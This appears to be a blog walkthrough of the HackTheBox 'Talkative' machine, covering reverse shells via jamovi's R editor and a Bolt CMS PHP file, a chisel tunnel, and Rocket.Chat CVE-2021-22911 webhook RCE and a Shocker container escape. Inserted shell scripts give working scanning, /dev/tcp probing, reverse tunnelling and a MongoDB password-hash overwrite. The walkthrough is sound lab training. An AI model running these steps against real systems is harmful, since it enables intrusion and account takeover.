🔎🦶Enumeration/Foothold

I start every box by setting a variable to the box's IP and piping rustscan into xsltproc for an easy-to-read initial scan.
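The scan-and-render step above, as an added example rather than the author's exact command line. It assumes rustscan, nmap and xsltproc are installed and that nmap's stylesheet lives at /usr/share/nmap/nmap.xsl (the Debian/Kali path); the target address and the sample scan.xml are placeholders I constructed, not output from the box.

```shell
#!/bin/sh
# Added example, not the author's command line. Assumes rustscan, nmap and
# xsltproc are installed and nmap's stylesheet is at /usr/share/nmap/nmap.xsl.
set -eu

IP="${IP:-10.10.10.10}"   # placeholder target; export IP=... before running

# rustscan finds open ports quickly and hands them to nmap; everything after
# "--" is passed to nmap verbatim. -oX writes XML that xsltproc can render.
scan_host() {
  rustscan -a "$IP" --ulimit 5000 -- -sC -sV -oX scan.xml
  xsltproc /usr/share/nmap/nmap.xsl scan.xml -o scan.html
  echo "report written to scan.html"
}

# Terminal summary of open ports from an nmap XML file. nmap writes the
# <port>, <state> and <service> elements of each port on one line, so a
# grep/sed pair is enough; closed and filtered ports are skipped.
open_ports() {
  grep -o '<port protocol="[a-z]*" portid="[0-9]*"><state state="open"[^>]*/><service name="[^"]*"' "$1" \
    | sed -E 's#.*protocol="([a-z]+)" portid="([0-9]+)".*name="([^"]+)".*#\2/\1 \3#'
}

# Constructed sample scan.xml (not real output from the box) so the summary
# can be exercised without running a scan.
write_sample_xml() {
  cat > "$1" <<'EOF'
<?xml version="1.0"?>
<nmaprun scanner="nmap">
<host><address addr="10.10.10.10" addrtype="ipv4"/>
<ports>
<port protocol="tcp" portid="80"><state state="open" reason="syn-ack" reason_ttl="63"/><service name="http" product="Apache httpd" method="probed" conf="10"/></port>
<port protocol="tcp" portid="8080"><state state="open" reason="syn-ack" reason_ttl="63"/><service name="http-proxy" method="table" conf="3"/></port>
<port protocol="tcp" portid="8081"><state state="closed" reason="reset" reason_ttl="63"/><service name="blackice-icecap" method="table" conf="3"/></port>
</ports></host>
</nmaprun>
EOF
}

# Usage after a real scan: scan_host && open_ports scan.xml
if [ "${1:-}" = "demo" ]; then
  tmp=$(mktemp)
  write_sample_xml "$tmp"
  open_ports "$tmp"
  rm -f "$tmp"
fi
```

Run it with `demo` to see the summary on the constructed file; the HTML report is the one to keep for the writeup, the one-line summary is what you read while the service scan is still running.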

Reviewing the initial results I can see port 80 open, so I head over to the website. It redirects me to talkative.htb, so I add that to my hosts file.

Talkative website showing lots of juicy details.

I have to give some kudos to both authors for going the extra mile (especially TheCyberGeek) and taking the time to make it feel like an actual company website with real sentences. So many boxes are boilerplate templates and miss the initial OSINT.

I see a few possible usernames, and their profile pages show [email protected] as the email. I note all three users and continue. In the footer of the page I notice that the Products menu leads to additional links. I also notice that the Talkative.htb link goes to Bolt CMS; a /bolt endpoint confirms this, but I will leave that till later.

Heading over to the TALK-A-STATS (Coming Soon) page I can see jamovi listed; the page talks about data entry (a possible entry point) and has a 'beta' version available:

TALK-A-STATS mentioning Jamovi and a 'Beta' version.

The link takes me to Port 8080 and immediately I see the following:

TALK-A-STATS application states it has a security issue.

Clicking the three dots in the top-right corner I can see the version is 0.9.5.5. I Google the version and click around the application. I find the Rj Editor and see that a module for running R code inside jamovi is installed:

Plugin states you can run R code inside jamovi.

I went down the 🐰🕳️ for a while and eventually found this article, Ethz – R-Manual, which allowed me to get a reverse shell on the box.

Running a bash one-liner and catching the reverse shell.

I’ve been using pwncat more and more recently, and it came in handy here because it let me download the bolt-administration.omv file from the box to my machine.

An .omv file is a zip archive; inside its xdata.json I find a few usernames/passwords.

I try the passwords against the services I’ve seen so far and get a hit on the Bolt CMS admin login. Once logged in, I went to Settings > Configuration > Main Configuration to see if database credentials were available. Next I went to Settings > Configuration > All Configuration Files and noticed a bundles.php file.

🔝Escalation to Root

I went into the file, put a PHP one-liner in it and started a pwncat listener. I then made the request that loads bundles.php to grab the shell. On the container I used pwncat to upload LinPEAS and ran a scan. The 172.18.0.x container network stood out instantly.

I pulled ping to the box and ran a loop. I then proceeded to poke at 172.18.0.1 until I got a hit for SSH. Password reuse got me in: the same password as for Bolt worked for SSH.

I used pwncat to upload LinPEAS to the SSH session. I ran a loud scan but didn’t see anything useful. I decided to upload pspy next to see if anything was running in the background:

I can see an update_mongo.py script running. Looking at the MongoDB documentation I can see the default ports listed, 27017–27020. I used LinPEAS's built-in host/port scan to find the database.
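The two discovery steps above (the ping loop from the container, then the port check for MongoDB's defaults) as one added example written with nothing but ping and bash's /dev/tcp, so it works from a bare container or SSH session with no nmap. This is not the author's loop or LinPEAS's scanner; the 172.18.0.0/24 range is the one mentioned on the page and the timeouts are my choice.

```shell
#!/bin/sh
# Added example of host and port discovery without nmap. The /24 prefix and
# the 1-2 second timeouts are assumptions.
set -eu

# ICMP sweep of a /24: prints each address that answers a single ping.
ping_sweep() {
  prefix="$1"
  i=1
  while [ "$i" -le 254 ]; do
    if ping -c 1 -W 1 "$prefix.$i" >/dev/null 2>&1; then
      echo "$prefix.$i"
    fi
    i=$((i + 1))
  done
}

# TCP connect probe: bash opens /dev/tcp/host/port; timeout bounds the wait.
# Returns 0 when the port accepts a connection, non-zero otherwise.
tcp_open() {
  timeout 2 bash -c "exec 3<>/dev/tcp/$1/$2" 2>/dev/null
}

# MongoDB's default listening ports as listed in its documentation.
mongo_default_ports() {
  echo "27017 27018 27019 27020"
}

# Probe one host for the MongoDB defaults and print the ones that answer.
find_mongo() {
  for p in $(mongo_default_ports); do
    if tcp_open "$1" "$p"; then
      echo "$1:$p open"
    fi
  done
}

# Usage: ping_sweep 172.18.0; then find_mongo <each live address>
if [ "${1:-}" = "sweep" ]; then
  for h in $(ping_sweep "${2:-172.18.0}"); do
    find_mongo "$h"
  done
fi
```

Run with `sweep` to do both in one go. Containers often drop ICMP, so a host missing from the ping list is not proof it is down; probing 27017 directly on the addresses that pspy or LinPEAS hint at is the fallback.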

I then used chisel to forward the port to my local machine, with one command in saul's SSH session and one in my attacker session.

Once the connection was in place I 😭 for a moment, realizing it required another tool to connect to this database. I found these instructions HERE, ignored them, and found a single command for a deprecated tool (the tool still works, so I proceeded with it 😁!).

Reviewing the results I could now see this database was being used by the Rocket.Chat application, which I had seen before in HTB Paper. I referred to the link HERE to reset the password.
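The tunnel, the database lookup and the password reset from the three paragraphs above, as one added example. These are not the author's commands: the attacker address, the MongoDB container address, the database name and the use of the legacy `mongo` shell are all assumptions. The one detail worth knowing before trying a reset is that Rocket.Chat sits on Meteor, and Meteor bcrypts a SHA-256 hex digest of the password rather than the password itself, so a plain bcrypt hash will never match.

```shell
#!/bin/sh
# Added example covering the chisel tunnel, the legacy "mongo" shell and the
# password reset. Attacker address, Mongo container address and database name
# are placeholders.
set -eu

ATTACKER="${ATTACKER:-10.10.14.5}"
MONGO_HOST="${MONGO_HOST:-172.18.0.3}"
DB="${DB:-rocketchat}"

# Attacker session: chisel server that accepts reverse tunnels.
attacker_chisel() {
  ./chisel server -p 8000 --reverse
}

# Saul session: bind 127.0.0.1:27017 on the attacker to Mongo inside the
# Docker network. "R:" marks a reverse tunnel, format R:local:remote:port.
saul_chisel() {
  ./chisel client "$ATTACKER:8000" "R:27017:$MONGO_HOST:27017"
}

# Through the tunnel: list databases, then the users and their roles.
mongo_enum() {
  mongo --host 127.0.0.1 --port 27017 --quiet \
    --eval 'db.adminCommand("listDatabases").databases.map(function(d){return d.name})'
  mongo --host 127.0.0.1 --port 27017 --quiet "$DB" \
    --eval 'db.users.find({}, {username:1, roles:1}).forEach(printjson)'
}

# Meteor hashes client-side with SHA-256 and bcrypts the hex digest on the
# server, so the stored value is bcrypt(sha256hex(password)).
meteor_prehash() {
  printf '%s' "$1" | sha256sum | cut -d' ' -f1
}

# htpasswd emits a $2y$ prefix; the algorithm is identical to $2a$/$2b$, and
# rewriting the marker keeps older bcrypt libraries happy.
meteor_bcrypt() {
  htpasswd -bnBC 10 '' "$(meteor_prehash "$1")" | tr -d ':\n' | sed 's/^\$2y\$/$2b$/'
}

# Overwrite the stored hash for a user so the chosen password logs in.
reset_password() {
  user="$1"; hash="$(meteor_bcrypt "$2")"
  mongo --host 127.0.0.1 --port 27017 --quiet "$DB" --eval \
    "db.users.update({username:\"$user\"}, {\$set:{\"services.password.bcrypt\":\"$hash\"}})"
}

# Order of use: attacker_chisel (attacker), saul_chisel (saul), then
# mongo_enum and reset_password admin 'NewPassw0rd!' through the tunnel.
```

Take a copy of the original `services.password` document before overwriting it so the account can be put back afterwards; on a shared box the next person wants the original state.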

Logged into Rocket Chat as the Admin account.

The first thing I did was look for the version number as I saw no chats/channels available:

Rocket Chat version information.

After some research I found CSEnox – CVE-2021-22911 and THIS, which showed I could get RCE using a webhook. The process was pretty straightforward once I understood the script was Node.js.

🥇First

🥈Second

Building a WebHook by going to Administration > Integration > Incoming WebHook.

Finalizing the WebHook with my reverse shell.

🥉Third

Send the full curl, making sure your listener is running to catch the shell.

Once on the box I ran LinPEAS and LinEnum and discovered the container was vulnerable to Shocker (the Docker breakout that uses CAP_DAC_READ_SEARCH and open_by_handle_at to read files from the host filesystem). I altered the script to pull the root flag, compiled it, uploaded the binary to the box and ran it for the flag. This part is currently not documented (but will be when I’m feeling less lazy).
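The precondition check a practitioner wants before building Shocker at all, as an added example (not the author's exploit): open_by_handle_at() only walks the host filesystem when the container holds CAP_DAC_READ_SEARCH, which Docker's default capability set leaves out. The sample masks are constructed; the live value comes from /proc/self/status.

```shell
#!/bin/sh
# Added check for the capability Shocker depends on. Masks are the hex values
# printed in /proc/self/status; the sample masks used below are constructed.
set -eu

# Bit 2 of the capability bitmap is CAP_DAC_READ_SEARCH (linux/capability.h).
has_dac_read_search() {
  [ $(( (0x$1 >> 2) & 1 )) -eq 1 ]
}

# Effective capability mask of the current process.
current_capeff() {
  awk '/^CapEff:/ {print $2}' /proc/self/status
}

# Docker's default set (a80425fb) does not include the bit; --privileged,
# --cap-add=DAC_READ_SEARCH or a very old Docker release does.
check_shocker_precondition() {
  if has_dac_read_search "$1"; then
    echo "CAP_DAC_READ_SEARCH present: open_by_handle_at() can reach the host filesystem"
  else
    echo "CAP_DAC_READ_SEARCH absent: Shocker will not work from this container"
  fi
}

if [ "${1:-}" = "demo" ]; then
  check_shocker_precondition "$(current_capeff)"
fi
```

`capsh --decode=<mask>` prints the full capability list if capsh is installed; the arithmetic above is for containers where it is not.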

Rooted

Published On: August 24th, 2022 / Categories: HTB, Technology

One Comment

  1. Christopher Soehnlein 1st July 2022 at 12:12 pm

    I’ve been super busy with life (job, getting married, etc.) that I haven’t been actively writing guides. I have notes for Noter, StreamIO, Trick, Scrambled and Carpediem (ongoing) that I will be publishing on my site in due course.
